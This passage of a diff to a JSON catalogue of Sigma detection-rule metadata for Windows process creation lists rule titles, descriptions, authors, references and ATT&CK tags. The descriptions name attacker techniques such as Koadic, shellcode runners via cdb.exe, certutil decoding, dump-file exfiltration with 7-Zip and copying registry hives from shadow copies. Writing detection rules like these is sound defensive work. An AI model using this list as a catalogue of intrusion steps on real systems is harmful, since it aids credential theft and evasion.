"https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ + "attack.t1218", "attack.defense_evasion" ] }, - "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", - "value": "Start of NT Virtual DOS Machine" + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, { - "description": "Detects the use of 3proxy, a tiny free proxy server", + "description": "Detects command line parameters used by Koadic hack tool", "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/13", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/01/12", "falsepositive": [ - "Administrative activity" + "Unknown" ], - "filename": "proc_creation_win_susp_3proxy_usage.yml", + "filename": "proc_creation_win_hack_koadic.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/3proxy/3proxy", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ] }, - "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", - "value": "3Proxy Usage" + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution" }, { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "meta": { "author": "frack113", - "creation_date": "2021/07/27", + "creation_date": "2022/01/09", "falsepositive": [ - "Command line parameter combinations that contain all included strings" + "Unknown" ], - "filename": "proc_creation_win_susp_7z.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", - "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" - }, - { - "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/27", - "falsepositive": [ - "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_susp_7zip_dmp.yml", + "filename": "proc_creation_win_iis_http_logging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" ], "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.002" ] }, - "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "value": "7Zip Compressing Dump Files" + "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "value": "Disable Windows IIS HTTP Logging" }, { - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_add_local_admin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "value": "Add User to Local Administrators" - }, - { - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/06", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" - ] - }, - "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "value": "Suspicious Add User to Remote Desktop Users Group" - }, - { - "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", - "meta": { - "author": "frack113", + "author": "frack113, Nasreddine Bencherchali", "creation_date": "2021/12/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_adfind_enumeration.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "value": "Suspicious AdFind Enumeration" - }, - { - "description": "AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "meta": { - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", - "creation_date": "2021/02/02", - "falsepositive": [ - "Legitimate admin activity" - ], - "filename": "proc_creation_win_susp_adfind_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ] - }, - "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", - "value": "AdFind Usage Detection" - }, - { - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_adidnsdump.yml", + "filename": "proc_creation_win_susp_where_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" ], "tags": [ "attack.discovery", - "attack.t1018" + "attack.t1217" ] }, - "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "value": "Suspicious Execution of Adidnsdump" - }, - { - "description": "Detects the execution of AdvancedRun utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_advancedrun.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" - ], - "tags": "No established tags" - }, - "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", - "value": "Suspicious AdvancedRun Execution" - }, - { - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" - ], - "tags": "No established tags" - }, - "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", - "value": "Suspicious AdvancedRun Runas Priv User" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" - }, - { - "description": "Detects base64 encoded powershell 'Invoke-' call", - "meta": { - "author": "pH-T", - "creation_date": "2022/05/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_base64_invoke.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "value": "Suspicious Base64 Encoded Powershell Invoke" - }, - { - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_base64_load.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "value": "Suspicious Encoded Obfuscated LOAD String" - }, - { - "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", - "meta": { - "author": "@neu5ron", - "creation_date": "2019/02/07", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_bcdedit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", - "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" - ] - }, - "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", - "value": "Possible Ransomware or Unauthorized MBR Modifications" - }, - { - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bginfo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", - "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", - "value": "Application Whitelisting Bypass via Bginfo" - }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bitstransfer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", - "value": "Suspicious Bitstransfer via PowerShell" - }, - { - "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", - "meta": { - "author": "Florian Roth, Markus Neis", - "creation_date": "2018/08/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_builtin_commands_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/haroonmeer/status/939099379834658817", - "https://twitter.com/c_APT_ure/status/939475433711722497", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ] - }, - "uuid": "2887e914-ce96-435f-8105-593937e90757", - "value": "Reconnaissance Activity Using BuiltIn Commands" - }, - { - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/02/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_calc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ItsReallyNick/status/1094080242686312448", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "value": "Suspicious Calculator Usage" - }, - { - "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", - "meta": { - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/10/26", - "falsepositive": [ - "Legitimate use of debugging tools" - ], - "filename": "proc_creation_win_susp_cdb.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", - "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", - "https://twitter.com/nas_bench/status/1534957360032120833", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1218", - "attack.t1127" - ] - }, - "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner" - }, - { - "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", - "meta": { - "author": "Florian Roth, juju4, keepwatch", - "creation_date": "2019/01/16", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_certutil_command.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/egre55/status/1087685529016193025", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.command_and_control", - "attack.t1105", - "attack.s0160", - "attack.g0007", - "attack.g0010", - "attack.g0045", - "attack.g0049", - "attack.g0075", - "attack.g0096" - ] - }, - "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", - "value": "Suspicious Certutil Command Usage" - }, - { - "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", - "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/02/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_certutil_encode.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "value": "Certutil Encode" - }, - { - "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_char_in_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", - "value": "Obfuscated Command Line Using Special Unicode Characters" - }, - { - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "meta": { - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/antonioCoco/RogueWinRM", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" - ] - }, - "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "value": "Suspicious Child Process Created as System" - }, - { - "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_cipher.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "4b046706-5789-4673-b111-66f25fe99534", - "value": "Overwrite Deleted Data with Cipher" - }, - { - "description": "Detects suspicious process that use escape characters", - "meta": { - "author": "juju4", - "creation_date": "2018/12/11", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_cli_escape.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vysecurity/status/885545634958385153", - "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/Hexacorn/status/885570278637678592", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ] - }, - "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "value": "Suspicious Commandline Escape" - }, - { - "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", - "falsepositive": [ - "Some FP is expected with some installers" - ], - "filename": "proc_creation_win_susp_clsid_foldername.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Kostastsale/status/1565257924204986369", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "value": "Suspicious CLSID Folder Name In Suspicious Locations" - }, - { - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "meta": { - "author": "frack113", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "178e615d-e666-498b-9630-9ed363038101", - "value": "Suspicious Elevated System Shell" - }, - { - "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", - "value": "Suspicious Cmd Execution via WMI" - }, - { - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/01/16", - "falsepositive": [ - "High" - ], - "filename": "proc_creation_win_susp_cmd_http_appdata.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", - "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "value": "Command Line Execution with Suspicious URL and AppData Strings" - }, - { - "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Some rare backup scenarios" - ], - "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "value": "Copy from Volume Shadow Copy" - }, - { - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "meta": { - "author": "_pete_0, TheDFIRReport", - "creation_date": "2022/02/21", - "falsepositive": [ - "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" - ], - "filename": "proc_creation_win_susp_codepage_lookup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1614.001" - ] - }, - "uuid": 